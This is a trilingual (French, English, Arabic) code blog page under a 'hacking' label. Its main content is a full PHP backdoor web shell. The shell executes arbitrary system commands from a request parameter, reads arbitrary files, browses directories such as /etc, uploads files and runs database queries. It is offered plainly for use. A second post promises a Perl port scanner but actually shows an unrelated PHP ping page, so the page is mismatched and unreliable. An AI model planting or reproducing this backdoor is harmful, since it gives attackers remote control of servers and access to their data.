Scripts | Codes

All languages in three languages :-)
Showing posts with label hacking. Show all posts

[PHP] A very simple and effective backdoor | Un backdoor simple et efficace Edit

, , , , , , 0 commentaires

Un backdoor simple et efficace.
Sans commentaires

A very simple and effective backdoor.
No comments

باكدوور بسيط و فعال 

بدون تعليق 

Open in a new window
<?
//#################################################
// find more codes on scripts-n-codes.blogspot.com
//#################################################
//
// a simple php backdoor
//

ob_implicit_flush();
if(isset($_REQUEST['f'])){
        $filename=$_REQUEST['f'];
        $file=fopen("$filename","rb");
        fpassthru($file);
        die;
}
if(isset($_REQUEST['d'])){
        $d=$_REQUEST['d'];
        echo "<pre>";
        if ($handle = opendir("$d")) {
        echo "<h2>listing of $d</h2>";
                   while ($dir = readdir($handle)){ 
                       if (is_dir("$d/$dir")) echo "<a href='$PHP_SELF?d=$d/$dir'><font color=grey>";
       else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
                       echo "$dir\n"; 
                       echo "</font></a>";
                }
                       
        } else echo "opendir() failed";
        closedir($handle);
        die ("<hr>"); 
}
if(isset($_REQUEST['c'])){
 echo "<pre>";
 system($_REQUEST['c']);     
 die;
}
if(isset($_REQUEST['upload'])){

  if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
   else $dir=$_REQUEST['dir'];
  $fname=$HTTP_POST_FILES['file_name']['name'];
  if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
   die('file uploading error.');
}
if(isset($_REQUEST['mquery'])){
 
 $host=$_REQUEST['host'];
 $usr=$_REQUEST['usr'];
 $passwd=$_REQUEST['passwd'];
 $db=$_REQUEST['db'];
 $mquery=$_REQUEST['mquery'];
 mysql_connect("$host", "$usr", "$passwd") or
    die("Could not connect: " . mysql_error());
    mysql_select_db("$db");
    $result = mysql_query("$mquery");
 if($result!=FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
    while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);  
    mysql_free_result($result);
 die;
}
?>
<pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form> 
<form enctype="multipart/form-data" action="<?php echo $PHP_SELF; ?>" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
upload file:<input name="file_name" type="file">   to dir: <input type="text" name="dir">  <input type="submit" name="upload" value="upload"></form>
<hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory here]
<br>for example:
http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix
or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
<hr>execute mysql query:
<form action="<? echo $PHP_SELF; ?>" METHOD=GET >
host:<input type="text" name="host"value="localhost">  user: <input type="text" name="usr" value=root> password: <input type="text" name="passwd">

database: <input type="text" name="db">  query: <input type="text" name="mquery"> <input type="submit" value="execute">
</form>

[PERL] Port scanner (very small) | Scanneur de ports (très petit) Edit

, , , , 0 commentaires


Un scanner de ports très petit...

Utilisation: [exemple]
perl scan.pl 127.0.0.1 0 55555
Va scanner le localhost du port 0 à 55555

A very small port scanner...

Usage: [example]
perl scan.pl 127.0.0.1 0 55555
Will scan all ports from 0 to 55555 on the localhost

يسمح بمسحح كل منافذ الكمبيوترو صغير جدا

يسمح بمسحح كل منافذ الكمبيوترو صغير جدا
 مثال عن الاستعمال‎ 
perl scan.pl 127.0.0.1 0 66666
يسمح بمسح كل المنافذ من ٠ إلى ٦٦٦٦٦ على لوكالهوست 

Open in a new window
<?
//#################################################
// find more codes on codes-n-scripts.blogspot.com
//#################################################
?>
<html>
 <head>
  <title>Web Ping</title>
  <style type='text/css'>
   pre {
    background:black;
 border:1px lime solid;
 color:lime;
   }
   td {
    font-family:monospace;
   }
  </style>
 </head>
 <body>
  <?php

   # clean the strings to prevent injection attacks
   $BADCHARS='/[^\.\w]/';
   $HOST=preg_replace($BADCHARS, '', $_GET['host']);
   $C=preg_replace($BADCHARS, '', $_GET['c']);
   $I=preg_replace($BADCHARS, '', $_GET['i']);
 
   if ($I=="") { $I=1; } # assign default values
   if ($C=="") { $C=4; } # assign default values

   if ($HOST!="") { # this is where the magic happens
    echo '<pre>';
    $last_line = system('/bin/ping '.$HOST.' -c '.$C.' -i '.$I, $retval);
    echo '</pre>';
   }
 
  ?>
  <form action='ping.php' method='get'>
   <table>
    <tr>
     <td>Hostname/IP:</td><td><input type='text' name='host' value='<?php echo $HOST ?>'/></td>
    </tr>
 <tr>
  <td>count:</td><td><input type='text' name='c' value='<?php echo $C ?>' /></td>
 </tr>
 <tr>
  <td>interval:</td><td><input type='text' name='i' value='<?php echo $I ?>' /></td>
 </tr>
    <tr>
     <td colspan='2'>
      <input type='submit' value='Ping It' /><br><br><br>
     </td>
    </tr>
   </table>
  </form>
 </body>
</html>

Subscribe to: Posts (Atom)
attendez....